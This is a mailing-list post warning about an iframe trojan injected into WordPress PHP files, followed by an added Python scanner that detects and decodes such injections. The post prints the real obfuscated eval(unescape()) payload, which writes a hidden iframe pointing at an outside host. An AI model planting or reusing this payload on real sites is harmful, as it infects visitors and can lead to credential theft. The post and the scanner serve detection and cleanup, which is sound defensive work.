Hello Friends,

Today when I went to the office and opened the site I had worked on, I got a strange problem: Kaspersky was reporting that a trojan program was running. I checked 2 to 3 times by entering the URL in the address bar, and after that I understood that it was an Iframe Trojan, and I worked on it. The problem with it is mainly that it will stop index.php; if you don't have antivirus, the trojan will install on your system, take all your usernames and passwords, and take important information from your system. It just adds JavaScript code to index.php, at the end or in the head part. The code will look like this:

<script>eval(unescape(“%77%69%6e%64%6f%77%2e%73% 74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75 %6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72% 61%6d%65%20%6e%61%6d%65%3d%62%30%20%73%72%63%3d% 5c%27%68%74%74%70%3a%2f%2f%66%72%65%64%6b%69%64% 6e%73%2e%63%6f%6d%2f%63%68%65%63%6b%2f%75%70%64%2 e%70%68%70%3f%74%3d%35%36%32%3f%27%2b%4d%61%74%68 %2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64% 6f%6d%28%29%2a%31%34%30%39%34%29%2b%27%39%33%64% 63%63%35%66%33%5c%27%20%77%69%64%74%68%d%32%36%3 1%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%6 5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65 %5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29″)); </script>

This IFrame malware can infect any PHP file in theory, because it is just a piece of code that has to be injected into the file, but provided that you are using WordPress on your blog, most likely the files infected by it are:

- index.php in root folder
- wp-config.php in root folder
- index.php in wp-admin folder
- index.php in wp-contents\yourtheme\ folder
- default-filters.php in wp-includes folder

What it does is insert a piece of code at the end of each of the above-mentioned files, right after the ending ?> PHP tag, as shown below in the picture.

I went to those files, removed that code and changed the FTP credentials, and it's working fine. This Iframe Trojan is creating a lot of problems nowadays, so please be aware of this.

--
You received this message because you are subscribed to the Google Groups "nforceit" group.
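A way to find the injection described in the post above across a whole site tree, as an added example that is not part of the original message: it looks only at what follows the final ?> in each .php file, flags an eval(unescape(...)) script there, and decodes it for review. The function names, the sample tree and the harmless .invalid payload are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# <script>eval(unescape("%xx%xx...")), tolerant of straight or curly opening quotes
OBFUSCATED = re.compile(
    r"<script[^>]*>\s*eval\(\s*unescape\(\s*[\"'\u201c](?P<blob>[%0-9a-fA-F\s]+)",
    re.IGNORECASE,
)
HIDDEN_IFRAME = re.compile(r"<iframe\b[^>]*display\s*:\s*none", re.IGNORECASE)

def trailing_content(source: str) -> str:
    """Return whatever follows the last closing PHP tag ('' if there is none)."""
    _, tag, tail = source.rpartition("?>")
    return tail if tag else ""

def inspect_php(source: str):
    """Return a finding dict for a script appended after the final '?>', else None."""
    match = OBFUSCATED.search(trailing_content(source))
    if not match:
        return None
    # Strip line-wrap whitespace, then percent-decode; malformed escapes stay as-is.
    decoded = unquote(re.sub(r"\s+", "", match["blob"]))
    return {"decoded": decoded, "hidden_iframe": bool(HIDDEN_IFRAME.search(decoded))}

def scan_tree(root: Path) -> dict:
    """Scan every .php file under root; return findings keyed by relative path."""
    findings = {}
    for path in sorted(root.rglob("*.php")):
        result = inspect_php(path.read_text(encoding="utf-8", errors="replace"))
        if result:
            findings[path.relative_to(root).as_posix()] = result
    return findings

def demo() -> dict:
    """Build a constructed sample tree (harmless payload, .invalid host) and scan it."""
    payload = "document.write('<iframe src=\"http://example.invalid/\" style=\"display: none\"></iframe>')"
    blob = "".join(f"%{b:02x}" for b in payload.encode())
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-admin").mkdir()
        (root / "index.php").write_text(f'<?php echo "home"; ?>\n<script>eval(unescape("{blob}"));</script>\n')
        (root / "wp-admin" / "index.php").write_text('<?php echo "admin"; ?>\n')
        return scan_tree(root)

if __name__ == "__main__":
    for name, info in demo().items():
        print(name, "hidden iframe:", info["hidden_iframe"], "->", info["decoded"])
```

Point scan_tree at a copy of the web root to list affected files. A copy injected into the head part of a page rather than after the closing tag is outside what this check covers.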
